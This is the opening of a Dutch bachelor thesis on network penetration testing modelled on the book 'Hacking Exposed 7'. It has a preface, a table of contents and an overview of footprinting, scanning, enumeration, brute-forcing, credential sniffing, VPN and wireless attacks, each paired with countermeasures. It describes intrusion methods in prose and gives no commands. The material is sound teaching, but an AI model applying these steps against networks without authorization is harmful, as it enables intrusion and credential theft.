Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan...

164
Hogeschool-Universiteit Brussel Faculteit Bedrijfskunde Studiegebied Bedrijfskunde Bachelor in de toegepaste Informatica Hacking Exposed Bachelorproef aangeboden door Nathan Boone tot het behalen van de graad van Bachelor in de Toegepaste Informatica Academiejaar 2013 – 2014

Transcript of Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan...

Page 1: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

Hogeschool-Universiteit Brussel

Faculteit Bedrijfskunde

Studiegebied Bedrijfskunde

Bachelor in de toegepaste Informatica

Hacking Exposed

Bachelorproef aangeboden door

Nathan Boone

tot het behalen van de graad van

Bachelor in de Toegepaste Informatica

Academiejaar 2013 – 2014

Page 2: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,
Page 3: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

Voorwoord Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor

het onderdeel computernetwerken, welbepaald in netwerkbeveiliging. Computernetwerken

interesseert me omdat dit een onderdeel is waarop informatica tegenwoordig gebaseerd is. Zo goed

als iedereen die een computer gebruikt, gebruikt een netwerk. Enerzijds als entertainment: dit gaat

dan van online spelletjes te spelen tot sociale media op de smartphone. Anderzijds op professioneel

vlak: bedrijven die verschillende vestigingen hebben en die met elkaar willen communiceren via een

netwerk. Bij al deze zaken is netwerkbeveiliging een zeer belangrijk aspect, waarvan velen zelfs niet

weten dat dit bestaat.

Aangezien ik zo gefascineerd ben door netwerken heb ik gekozen om hier mijn eindwerk rond te

maken. Ik hoop mijn eindwerk tot een goed einde te brengen, mijn diploma te behalen en zo een

stap dichter komen tot de carrière die ik graag wil uitbouwen in het vak netwerkbeveiliging.

In het tweede semester ga ik naar Salzburg, om daar een stage te doen rond netwerkbeveiliging en

virtualisatie. De kennis die ik opgedaan heb doorheen deze bachelor proef, zal ik zeker ook kunnen

gebruiken tijdens mijn stage. Naast mijn stage zou ik mij ook graag certifiëren bij Cisco.

Mijn dank gaat uit naar de heer Andy Van Maele om mij op het idee te zetten om mijn eindwerk rond

netwerkbeveiliging te doen. Ook zou ik graag dank willen uitbrengen aan de heer Yvan Rooseleer en

de heer Gert Cauwenbergh omdat ze altijd klaarstonden als er vragen waren. De heer Serge Van

Cleynenbreugel zou ik ook graag willen bedanken voor zijn feedback als mentor. Zo wist ik dat ik

goed bezig was.

Page 4: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,
Page 5: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

Inhoudsopgave Voorwoord .............................................................................................................................................. 3

Inleiding ................................................................................................................................................. 13

Hoofdtekst ............................................................................................................................................. 15

1 Stappenplan ................................................................................................................................... 15

1.1 Footprinting ........................................................................................................................... 15

1.1.1 Google ........................................................................................................................... 15

1.1.2 Social Engineering.......................................................................................................... 15

1.2 Scanning ................................................................................................................................ 16

1.2.1 ARP Host Discovery ....................................................................................................... 16

1.2.2 ICMP Host Discovery ..................................................................................................... 16

1.2.3 TCP/UDP Host Discovery ............................................................................................... 16

1.3 Enumeratie ............................................................................................................................ 16

1.4 Hacking Unix .......................................................................................................................... 17

1.4.1 Brute-force .................................................................................................................... 17

1.4.2 Sniffer ............................................................................................................................ 17

1.5 Virtual Private Network ......................................................................................................... 17

1.6 Draadloze Hacking ................................................................................................................. 18

2 Verschillende cases ....................................................................................................................... 18

2.1 Case 1: Scanning en Intrusion Prevention System opstellen ................................................ 18

2.1.1 Scans .............................................................................................................................. 18

2.1.2 Intrusion Prevention System ......................................................................................... 18

2.2 Case 2: Netwerkverkeer afluisteren ...................................................................................... 19

2.2.1 Aanval ............................................................................................................................ 19

2.2.2 Verdediging ................................................................................................................... 19

2.3 Case 3: FTP beheren en hacken ............................................................................................. 19

3 Conclusie ....................................................................................................................................... 19

Lijst met bijlagen ................................................................................................................................... 21

Woordenlijst .......................................................................................................................................... 23

Prince 2TM - Project Initiation Document ............................................................................................... 27

1 Project Definition .......................................................................................................................... 27

2 Background .................................................................................................................................... 27

3 Project objectives .......................................................................................................................... 27

4 Desired outcomes .......................................................................................................................... 28

5 Project scope and exclusions ......................................................................................................... 28

6 Constraints and assumptions ........................................................................................................ 28

Page 6: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

7 The user(s) and any other known interested parties .................................................................... 28

8 Interfaces ....................................................................................................................................... 29

9 Project Approach ........................................................................................................................... 29

10 Project Management Team Structure ....................................................................................... 29

11 Role Descriptions ....................................................................................................................... 30

12 Quality Management Strategy .................................................................................................. 30

13 Configuration Management Strategy ........................................................................................ 31

14 Risk Management Strategy ....................................................................................................... 31

15 Communication Management Strategy .................................................................................... 31

16 Project Plan................................................................................................................................ 32

17 Project Controls ......................................................................................................................... 32

Stap 1: Footprinting ............................................................................................................................... 33

1 Inleiding ......................................................................................................................................... 33

2 Openbaar beschikbare informatie ................................................................................................ 33

2.1 Inleiding ................................................................................................................................. 33

2.2 Website ................................................................................................................................. 33

2.2.1 Commentaar .................................................................................................................. 33

2.2.2 Web Application Brute Forcing ..................................................................................... 33

2.3 Google Maps .......................................................................................................................... 34

2.4 Social Engineering ................................................................................................................. 34

2.5 Google Hacking Database (GHDB) ......................................................................................... 34

2.5.1 SiteDigger ...................................................................................................................... 34

2.6 FOCA 3.2 ................................................................................................................................ 35

2.7 Shodanhq ............................................................................................................................... 35

2.8 Forums ................................................................................................................................... 35

2.9 Openbaar beschikbare informatie Tegenmaatregels ........................................................... 35

3 WHOIS and DNS Enumeration ....................................................................................................... 36

3.1 Opzoeken van een IP-adres Tegenmaatregels ...................................................................... 37

3.2 DNS Interrogatie .................................................................................................................... 38

3.2.1 Zone transfers ................................................................................................................ 38

3.2.2 DNS-zone transfer Tegenmaatregels............................................................................. 39

4 Network Reconnaissance .............................................................................................................. 39

4.1 Tracerouting .......................................................................................................................... 39

4.1.1 Hoe werkt traceroute? .................................................................................................. 39

4.2 Network Reconnaissance Tegenmaatregels ......................................................................... 40

4.2.1 NIDS ............................................................................................................................... 40

Page 7: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

4.2.2 IPS .................................................................................................................................. 40

4.2.3 Conclusie ....................................................................................................................... 40

5 Conclusie ....................................................................................................................................... 40

Stap 2: Scanning .................................................................................................................................... 43

1 Algemene Inleiding ........................................................................................................................ 43

2 Host Discovery ............................................................................................................................... 43

3 ARP Host Discovery ....................................................................................................................... 43

3.1 MAC-ADRES ........................................................................................................................... 43

3.2 ARP-protocol ......................................................................................................................... 44

3.3 ARP-netwerk scan .................................................................................................................. 45

4 ICMP Host Discovery ..................................................................................................................... 46

4.1 ICMP Host Discovery Tegenmaatregel ................................................................................. 47

4.1.1 Gebruik van een Intrusion Detection System ................................................................ 47

4.1.2 Preventie van ping sweeps ............................................................................................ 47

5 TCP / UDP Host Discovery ............................................................................................................. 48

5.1 Poort scanning ....................................................................................................................... 48

5.1.1 Verschil tussen TCP en UDP ........................................................................................... 48

5.1.2 Programma’s waarmee je TCP en UDP scans kan uitvoeren ........................................ 50

6 Netwerk verkenning tools ............................................................................................................. 51

6.1 Nmap ..................................................................................................................................... 51

6.1.1 ICMP .............................................................................................................................. 51

6.1.2 TCP/UDP poort scanning ............................................................................................... 51

6.2 Hping3 en Nping .................................................................................................................... 55

6.2.1 ICMP scan ...................................................................................................................... 55

6.2.2 TCP/UDP port scanning ................................................................................................. 56

6.3 ScanLine ................................................................................................................................. 57

6.4 netcat ..................................................................................................................................... 57

6.4.1 TCP poortscan ................................................................................................................ 57

6.4.2 UDP poortscan ............................................................................................................... 58

6.5 SuperScan .............................................................................................................................. 58

6.6 Poort scans Tegenmaatregels ............................................................................................... 59

6.6.1 Snort IDS ........................................................................................................................ 59

6.6.2 Treshold logging ............................................................................................................ 59

6.6.3 Onnodige services afzetten ........................................................................................... 59

6.6.4 Voorzichtig te werk gaan met tegenmaatregels ........................................................... 59

7 Raden naar het besturingssysteem ............................................................................................... 60

Page 8: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

7.1 Active Stack Fingerprinting .................................................................................................... 60

7.2 Passive Stack Fingerprinting .................................................................................................. 61

7.3 Raden naar het besturingssysteem Tegenmaatregels .......................................................... 61

8 Processing and storing scan data .................................................................................................. 62

Stap 3: Ennumeratie .............................................................................................................................. 63

1 Inleiding ......................................................................................................................................... 63

2 Nmap version scanning ................................................................................................................. 63

2.1 TCP SYN poortscan ................................................................................................................ 64

2.2 TCP versiescan ....................................................................................................................... 64

3 Basic Banner Grabbing .................................................................................................................. 65

3.1 Banner Grabbing met Telnet ................................................................................................. 65

3.2 Banner Grabbing Tegenmaatregels ....................................................................................... 66

4 Enumerating veel voorkomende services ..................................................................................... 66

4.1 FTP Enumeration, TCP 21 ...................................................................................................... 66

4.1.1 FTP anonymous access .................................................................................................. 66

4.1.2 FTP Tegenmaatregels .................................................................................................... 67

4.2 Telnet Enumeratie, TCP 23 .................................................................................................... 67

4.2.1 System Enumeratie via Telnet Banners ......................................................................... 67

4.2.2 User Enumeratie via Telnet ........................................................................................... 68

4.2.3 Telnet Enumeratie Tegenmaatregels ............................................................................ 68

4.3 TFTP Enumeratie, TCP/UDP 69 .............................................................................................. 68

4.3.1 Bestanden kopiëren met een Linux TFTP Server ........................................................... 68

4.3.2 Accessing Router/Switch Configurations via TFTP ........................................................ 68

4.3.3 TFTP Enumeratie Tegenmaatregels ............................................................................... 69

4.4 IPSec/IKE, UDP 500 ................................................................................................................ 69

4.4.1 Probing IPSec tunnel ...................................................................................................... 69

4.4.2 IPSec/IKE Enumeratie Tegenmaatregels ....................................................................... 69

Stap 4: Hacking Unix .............................................................................................................................. 71

1 Inleiding ......................................................................................................................................... 71

2 Brute-force Aanval......................................................................................................................... 71

2.1 Brute-force aanval toepassen ............................................................................................... 71

2.2 Brute-Force aanval Tegenmaatregels ................................................................................... 72

3 File Transfer Protocol .................................................................................................................... 73

3.1 FTP-server aanvallen ............................................................................................................. 73

3.2 FTP aanval Tegenmaatregels ................................................................................................ 73

4 Secure Shell ................................................................................................................................... 74

Page 9: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

4.1 SSH ......................................................................................................................................... 74

4.2 SSH Tegenmaatregels ........................................................................................................... 74

5 Sniffers ........................................................................................................................................... 74

5.1 Wat is een sniffer? ................................................................................................................. 74

5.2 Aanvaller ................................................................................................................................ 74

5.3 Administrator ........................................................................................................................ 74

5.4 Hoe werkt een sniffer? .......................................................................................................... 74

5.5 Voorbeeld van een sniffer ..................................................................................................... 74

5.6 Populaire sniffers ................................................................................................................... 76

5.7 Sniffers Tegenmaatregel....................................................................................................... 76

5.7.1 Migreren naar een switched netwerk topologie ........................................................... 76

5.7.2 Sniffers detecteren ........................................................................................................ 76

5.7.3 Encryptie (SSH, IPSec) .................................................................................................... 76

6 Honeypot server ............................................................................................................................ 77

Stap 5: Virtual Private Network ............................................................................................................. 79

1 Inleiding ......................................................................................................................................... 79

2 Virtual Private Network (VPN) ....................................................................................................... 79

2.1 De tot stand komst van een IPSec VPN ................................................................................. 80

2.1.1 Internet Key Exchange Fase 1 (IKE Fase 1) .................................................................... 80

2.1.2 Internet Key Exchange Fase 2 (IKE Fase 2) .................................................................... 81

2.2 Site-to-site VPN ..................................................................................................................... 82

2.3 Client-to-site VPN .................................................................................................................. 82

2.4 Google hacking voor VPN ...................................................................................................... 82

2.4.1 Google hacking voor VPN Tegenmaatregel ................................................................... 83

2.5 Probing IPSec VPN Servers .................................................................................................... 83

2.5.1 Probing IPSec VPN Servers Tegenmaatregel ................................................................. 83

2.6 Attacking IKE Aggressive Mode ............................................................................................. 84

2.6.1 Attacking IKE Aggressive Mode Tegenmaatregel .......................................................... 84

Stap 6: Wireless Hacking ....................................................................................................................... 85

1 Inleiding ......................................................................................................................................... 85

2 Achtergrond ................................................................................................................................... 85

3 Channels en frequenties ................................................................................................................ 85

4 Verschillende types Wi-Fi .............................................................................................................. 86

4.1 Ad-hoc ................................................................................................................................... 86

4.2 Infrastructure ........................................................................................................................ 86

5 Manieren om een draadloos netwerk te beveiligen ..................................................................... 87

Page 10: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

5.1 Basis methodes ...................................................................................................................... 87

5.1.1 MAC filtering .................................................................................................................. 87

5.1.2 Verborgen draadloze netwerken .................................................................................. 87

5.1.3 Antwoorden op probe requests .................................................................................... 87

5.2 Authenticatie ......................................................................................................................... 88

5.2.1 WPA four-way handshake ............................................................................................. 88

5.3 Encryptie ................................................................................................................................ 89

6 Discovery en monitoren ................................................................................................................ 90

6.1 Active Discovery .................................................................................................................... 90

6.2 Active Discovery Tegenmaatregels ....................................................................................... 90

6.3 Passive Discovery................................................................................................................... 90

6.4 Passive Discovery Tegenmaatregels ...................................................................................... 90

6.5 Discovery tools ...................................................................................................................... 90

6.5.1 Kismet ............................................................................................................................ 91

6.5.2 Airodump-ng .................................................................................................................. 91

7 Denial of service attack ................................................................................................................. 92

7.1 De-authenticatie aanval ........................................................................................................ 92

7.1.1 airplay-ng ....................................................................................................................... 92

8 Encryptie aanval ............................................................................................................................ 93

8.1 WEP ....................................................................................................................................... 93

8.1.1 Achtergrond bij WEP encryptie ..................................................................................... 93

8.1.2 Passieve aanval .............................................................................................................. 93

8.2 ARP Replay with Fake authenticaton .................................................................................... 94

8.2.1 Aanval met de aircrack-ng suite .................................................................................... 95

8.2.2 WEP Hacking Tegenmaatregels ..................................................................................... 96

Case 1: Scannen en IPS instellen ........................................................................................................... 97

1 Inleiding ......................................................................................................................................... 97

2 Topologie Diagram ........................................................................................................................ 97

3 IP-adressen tabel ........................................................................................................................... 97

4 Objectieven ................................................................................................................................... 97

5 Stappenplan ................................................................................................................................... 98

5.1 Stap 1: Testnetwerk opstellen en uittesten .......................................................................... 98

5.1.1 IP-adressen instellen ..................................................................................................... 98

5.1.2 OSPF instellen ................................................................................................................ 98

5.1.3 Testnetwerk uittesten ................................................................................................... 99

5.2 Stap 2: Netwerk scannen ....................................................................................................... 99

Page 11: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

5.2.1 ARP-scan ........................................................................................................................ 99

5.2.2 Ping-sweep .................................................................................................................. 100

5.2.3 TCP poortscan .............................................................................................................. 100

5.2.4 Intense scan ................................................................................................................. 101

5.3 Stap 3: Intrusion Prevention System ................................................................................... 102

5.3.1 Intrusion Prevention System instellen ........................................................................ 102

6 Conclusie ..................................................................................................................................... 112

Case 2: Netwerkverkeer afluisteren .................................................................................................... 113

1 Inleiding ....................................................................................................................................... 113

2 Topologie Diagram ...................................................................................................................... 113

3 IP Adressen Tabel ........................................................................................................................ 114

4 Objectieven ................................................................................................................................. 114

5 Stappenplan ................................................................................................................................. 114

5.1 Stap 1: Testnetwerk opstellen en uittesten ........................................................................ 114

5.1.1 IP-adressen en een default-route instellen op de HoofdRouter ................................. 115

5.1.2 DHCP server configureren ........................................................................................... 115

5.1.3 Testnetwerk uittesten ................................................................................................. 116

5.2 Stap 2: Netwerk scannen ..................................................................................................... 117

5.3 Stap 3: ARP poisoning toepassen en Telnet verkeer afluisteren ........................................ 118

5.3.1 ARP Poisoning .............................................................................................................. 118

5.3.2 ARP Poisoning met Ettercap ........................................................................................ 119

5.4 Stap 4: MAC table flooding .................................................................................................. 121

6 Tegenmaatregel tegen afluisteren van het netwerk ................................................................... 122

6.1 Switchport port security ...................................................................................................... 122

6.2 Dynamic ARP-inspection ..................................................................................................... 122

6.3 SSH in plaats van Telnet ...................................................................................................... 123

7 Conclusie ..................................................................................................................................... 123

Case 3: FTP beheren en aanvallen ....................................................................................................... 125

1 Inleiding ....................................................................................................................................... 125

2 Benodigdheden ........................................................................................................................... 125

2.1 FTP server ............................................................................................................................ 125

2.2 FTP client ............................................................................................................................. 125

3 Objectieven ................................................................................................................................. 125

4 Stappenplan ................................................................................................................................. 126

1. FTP server installeren en configureren ................................................................................... 126

2. FTP server configureren voor anonieme toegang ................................................................... 127

Page 12: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

3. Logging inschakelen ................................................................................................................. 129

4. Server proberen kraken ........................................................................................................... 131

5. Conclusies trekken ................................................................................................................... 131

6. Anonieme toegang uitschakelen, configuratie aanpassen en accounts aanmaken ............... 131

7. Server proberen kraken ........................................................................................................... 133

5 Conclusie ..................................................................................................................................... 136

Bibliografie .......................................................................................................................................... 137

1 Websites ...................................................................................................................................... 137

2 Boeken ......................................................................................................................................... 137

Timesheets .......................................................................................................................................... 138

1 Tijdstabel Hacking Exposed ......................................................................................................... 138

2 Tijdstabel Netwerk Security ........................................................................................................ 143

Curriculum Vitae Nathan Boone.......................................................................................................... 150

......................................................................................................................................................... 150

De presentatie ..................................................................................................................................... 153

Page 13: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

13

Inleiding De meeste netwerkgebruikers zijn tevreden als ze het internet kunnen gebruiken voor allerhande

doeleinden. Ze zijn niet bewust van de gevaren dat dit met zich meebrengt.

Het project dat ik gerealiseerd heb, is een stappenplan dat een netwerk beheerder kan gebruiken om

na te gaan of zijn netwerk veilig is. Dit zijn natuurlijk ook stappen die een hacker kan gebruiken om

binnen te breken in een netwerk.

Deze stappen omvatten enerzijds aanvallen die kunnen uitgevoerd worden door de hacker en

anderzijds, tegenmaatregelen die gebruikt kunnen worden door de netwerkbeheerder.

Als basis voor dit eindwerk heb ik de methodiek gebruikt zoals beschreven staat in het boek Hacking

Exposed 7. Dit boek is geschreven door Stuart McClure, Joel Scambray en George Kurtz. Als keuzevak

heb ik het vak CCNA Security gevolgd, gedoceerd door Yvan Rooseleer. Dit heeft me nog een andere

kijk gegeven op netwerkbeveiliging en hoe dit in een netwerk kan geïmplementeerd worden en wat

de “best practices” zijn.

Om vele aanvallen die besproken staan in dit document uit te voeren heb ik Backtrack 5 r3

geïnstalleerd. Dit is een besturingssysteem dat speciaal ontworpen is om aan “penetration testing” te

doen. Dit is de vorm van hacking die besproken zal worden.

In de hoofdtekst zullen de verschillende stappen in de methodiek kort en bondig besproken worden.

De tegenmaatregels en meer informatie over de stappen zijn terug te vinden in de bijlagen.

In dit document gaat het zowel over aanvallen als tegenmaatregels. De tegenmaatregels heb

ik gekenmerkt door er een verbodsteken voor te plaatsen.

Er zijn vrij veel commando’s gebruikt in deze tekst. Om een duidelijk onderscheid te brengen tussen

de tekst en de commando’s heb ik de deze stijl gebruikt om de commando’s te kenmerken.

Page 14: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

14

Page 15: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

15

Hoofdtekst De hoofdtekst bestaat uit twee delen, een stappenplan en een overzicht van de verschillende cases.

1 Stappenplan Dit is een stappenplan van 6 stappen volgens de methodiek besproken in het boek “Hacking Exposed

7. In dit stappenplan zullen de stappen één voor één uitgelegd worden. Een gedetailleerdere uitleg

en gedane testen zijn terug te vinden in de bijlagen.

1.1 Footprinting Je kan niet zomaar ergens binnenbreken en het netwerk beginnen te hacken, want dit zou tot weinig

succes leiden. Deze eerste stap is het in kaart brengen van de onderneming of de persoon bij wie je

wil inbreken. Als je wil inbreken in een huis moet je zeker ook eerst de omgeving analyseren voor je

zal kunnen toeslaan, anders zal je heel veel getuigen hebben, en aanwijzingen achterlaten. Bij hacking

is het belangrijk dat je zo weinig mogelijk sporen achterlaat. Dit is de moeilijkste taak van de hacker.

Iedereen kan hacken, maar de persoon die geen sporen achterlaat is de beste hacker.

Terwijl je je opzoekingswerk aan het doen bent naar de persoon of onderneming in kwestie, is het

belangrijk dat je geen sporen achterlaat. Dit om te voorkomen dat ze weten dat er een aanval zal

plaatsvinden. Ze kunnen dan ook geen voorzorgsmaatregelen nemen tegen de bepaalde aanval die jij

wil plegen.

1.1.1 Google Google is een zoekmachine die veel gebruikt wordt bij Footprinting. Je kan er allerhande zoektermen

ingeven om zo naar personen, bedrijven en zelfs configuraties van toestellen te zoeken. Deze

speciale zoektermen zijn te vinden in de “Google Hacking Database” (GHDB).

Door te zoeken naar een eventueel probleem bij het instellen van een netwerk, kan je zo aan geldige

IP-adressen komen. Vele netwerkbeheerders die een vraag hebben, stellen deze vraag op een forum

zonder de gevoelige gegevens hiervan te wissen.

Google is ook gekend voor zijn “Google Maps” applicatie, welbepaald “Streetview”. Hiermee kan je

zoeken naar bedrijven en kan je virtueel zelfs rondlopen op een bedrijventerrein. Dit zou je kunnen

doen om te identificeren waar je ongemerkt van in je auto het draadloos netwerk kan infiltreren. Het

is belangrijk als bedrijf dat je ervoor zorgt dat het draadloos netwerk niet buiten de bedrijfsmuren

gaat. Je kan dit doen door de sterkte van het signaal aan te passen.

1.1.2 Social Engineering Social Engineering is een methode die zeer veel gebruikt wordt om aan Footprinting te doen. Zo goed

als iedereen of elk bedrijf heeft wel ergens een profiel op sociale media. Dit kan gaan van een

professionele pagina op LinkedIn tot een pagina op Facebook waar private informatie op te vinden is.

Op deze manier is het gemakkelijk opzoekingswerk te verrichten over de persoon of het bedrijf in

kwestie zonder dat zij hier iets van te weten komen.

Page 16: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

16

1.2 Scanning In stap Footprinting ging het over het in kaart brengen van een bedrijf en hoe je verschillende

gevoelige gegevens kan te weten komen. In deze stap gaan we hierin verder, hier zullen we

verschillende scans uitvoeren om zo het netwerk van het betreffende bedrijf in kaart te brengen. We

zullen ook te weten kunnen komen hoe we door firewalls kunnen dringen en welke apparaten met

welke services in het netwerk actief zijn.

Op een netwerk zijn verschillende manieren van “Host Discovery” mogelijk.

1.2.1 ARP Host Discovery Bij ARP Host Discovery zal je gebruik maken van het ARP-protocol om aan Host Discovery te doen. Je

kan aan een range van IP-adressen ARP-Requests sturen. Door het ARP-protocol zullen de hosts met

de bepaalde IP-adressen antwoorden met een ARP-Reply. Als je een ARP-Reply terugkrijgt, weet je

dus dat die host aanwezig is op het netwerk.

1.2.2 ICMP Host Discovery Bij ICMP Host Discovery zal je naar de verschillende IP-adressen ICMP Echo Requests sturen. Van de

toestellen waarvan je een ICMP Echo Reply terugkrijgt, weet je dat ze aanwezig zijn op het netwerk.

1.2.3 TCP/UDP Host Discovery Elk toestel heeft TCP of UDP netwerk poorten. Achter deze poorten bevinden zich services, één van

deze services is bijvoorbeeld het mogelijk maken naar een website te gaan. Als je naar een website

gaat, zal je surfen naar poort 80 omdat poort 80 HTTP is.

Bij TCP/UDP Host Discovery zal je op verschillende manieren een connectie proberen op te bouwen

met verschillende poorten. Van de poorten die de connectie aanvaarden, weet je dat de

achterliggende service aan staat.

1.3 Enumeratie In stap twee Scanning zijn we op zoek gegaan naar welke services op welke toestellen aanwezig zijn

in een netwerk. In deze stap gaan we hier nog verder op in. We zullen bij Enumeratie overgaan tot

het identificeren van de service en het besturingssysteem. We kunnen hierbij ook te weten komen

welke versie hiervan geïnstalleerd is. Om dit te kunnen doen, zullen we connecties moeten opstellen

naar de systemen. Deze connecties zullen waarschijnlijk gelogd worden door het systeem dat je wil

aanvallen. Hierdoor bestaat er een mogelijkheid dat je uitgesloten wordt van het netwerk.

Veel van de informatie die je via enumeratie buitmaakt, lijkt op het eerste zicht ongevaarlijk. Maar

vooraleer je kan binnenbreken in een systeem zal je eerst de service, poort en versie moeten

identificeren. Eens deze geïdentificeerd zijn kan je op zoek gaan naar gekende kwetsbaarheden.

De services die verder uitgelegd worden in de bijlage over Enumeratie zijn:

FTP: TCP poort 21

Telnet: TCP poort 23

TFTP: TCP/UDP poort 69

IPSec/IKE: UDP poort 500

Page 17: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

17

1.4 Hacking Unix In de vorige stappen was het doel om het netwerk in kaart te brengen en informatie te krijgen over

de verschillende aanwezige systemen, protocollen en waar deze aanwezig zijn in het netwerk. In

deze stap zullen we proberen binnen te breken in de specifieke services. Het doel van deze stap is

toegang krijgen tot de systemen en waar het kan “root access” proberen te verkrijgen op de

systemen.

Deze stap heet “Hacking Unix”. Er bestaat ook een stap “Hacking Windows” maar omdat de meeste

servers bestaan uit Unix-servers hebben we beslist om enkel “Hacking Unix” te bespreken.

1.4.1 Brute-force Om in de services binnen te breken, kan je gebruik maken van een brute-force aanval. Deze aanval

zal op een korte tijd zeer veel wachtwoorden en gebruikersnamen uitproberen naar de verschillende

services. Wat je meestal doet bij een brute-force aanval, zijn de gebruikersnamen en gegevens over

het bedrijf dat je verworven hebt bij Footprinting in bestanden steken. Je kan deze bestanden dan

gebruiken als mogelijke wachtwoorden en gebruikersnamen bij de brute-force aanval. De meest

gebruikte wachtwoorden zijn, je woonplaats, een simpele cijfercombinatie of je eigen naam.

1.4.2 Sniffer Als je een service zoals Telnet gebruikt, waarbij al de ingetypte tekst in gewoon, niet-geëncrypteerd

formaat over het netwerk verstuurd wordt kan je door het netwerkverkeer af te luisteren aan

wachtwoorden en gebruikersnamen komen. Hierdoor kan je je inloggen in de bepaalde services.

Een Sniffer is een programma dat het mogelijk maakt om al het netwerkverkeer dat voorbijkomt af te

luisteren en te analyseren. Je kan ook een filter plaatsen zodat je enkel de pakketten ziet die je

interesseren.

1.5 Virtual Private Network Er zijn zeer veel bedrijven die toelaten dat hun medewerkers van op afstand werken op en naast de

systemen die in de onderneming staan. Eén van de voorwaarden hiervan is dat de gegevens veilig bij

de onderneming geraken. Om hiervoor te zorgen, gebruiken veel ondernemingen een Virtual Private

Network (VPN).

Als je bij een Virtual Private Network kan binnenbreken, dan heb je toegang tot het interne netwerk

van dat bedrijf en wordt je aanzien als een vertrouwde gebruiker.

Een VPN heeft vier grote voordelen:

Confidentialiteit

Data integriteit

Authenticatie

Antireplay

Page 18: Hogeschool-Universiteit Brussel · 2014-02-05 · Voorwoord. Als student Toegepaste Informatica aan de Hogeschool Universiteit Brussel interesseer ik me voor het onderdeel computernetwerken,

18

1.6 Draadloze Hacking In een bedrijfsomgeving wordt een draadloos netwerk steeds meer gebruikt, omdat het gemakkelijk

is als er gasten zijn die hun eigen toestellen meenemen. Dit geldt niet alleen voor gasten, in vele

bedrijven wordt er gedaan aan BYOD, dit is de term voor “Bring Your Own Device”. Als hun eigen

toestel dan een tablet is, dan is er geen andere keuze dan te kiezen voor een draadloze oplossing

voor het netwerk.

Een draadloos netwerk is altijd het punt in het netwerk dat het moeilijkste te beveiligen is. Als je

draadloos netwerk tot buiten de fysieke grenzen van je onderneming gaat, heb je zelfs geen sociale

controle meer of moet de aanvaller zelfs geen toegang krijgen tot je gebouw, maar kan hij van buiten

je gebouw proberen toegang te krijgen tot je draadloos netwerk.

Er bestaan verschillende manieren om je draadloos netwerk te beschermen, maar bij vele van deze

manieren is het mogelijk om de beveiligingscodes te kraken en zo een weg naar binnen te vinden.

2 Verschillende cases We hebben drie cases opgesteld en uitgevoerd om zo onze kennis op het vlak van netwerkbeveiliging

te testen.

We hebben een case opgesteld over scanning en hoe je ervoor kan zorgen dat je netwerk niet

gescand kan worden.

De tweede case gaat over het afluisteren van netwerkverkeer om zo aan wachtwoorden en

gebruikersnamen te geraken.

De laatste case gaat over FTP, we hebben een FTP server opgesteld en dan in deze FTP server

binnengebroken. In deze case gaat het ook over de tegenmaatregels die je kan nemen.

2.1 Case 1: Scanning en Intrusion Prevention System opstellen In case één wordt besproken hoe je scans kan uitvoeren op een netwerk en hoe je je hiertegen kan

beschermen.

2.1.1 Scans De scans die uitgevoerd worden zijn:

ARP-scan

ICMP-scan

TCP/UDP poortscan

2.1.2 Intrusion Prevention System Met een Intrusion Prevention System (IPS) kan je beperken welk verkeer je netwerk toelaat. Omdat

deze inline staat, kan een IPS, verkeer dat niet toegelaten is in het netwerk, niet doorlaten. Hierdoor

bereikt dit verkeer zijn eindbestemming niet.

Je kan met een IPS controleren op zowel de eigenschappen van de pakketten als ook op virussen of

andere kwaadaardige zaken die aanwezig kunnen zijn in een netwerk.

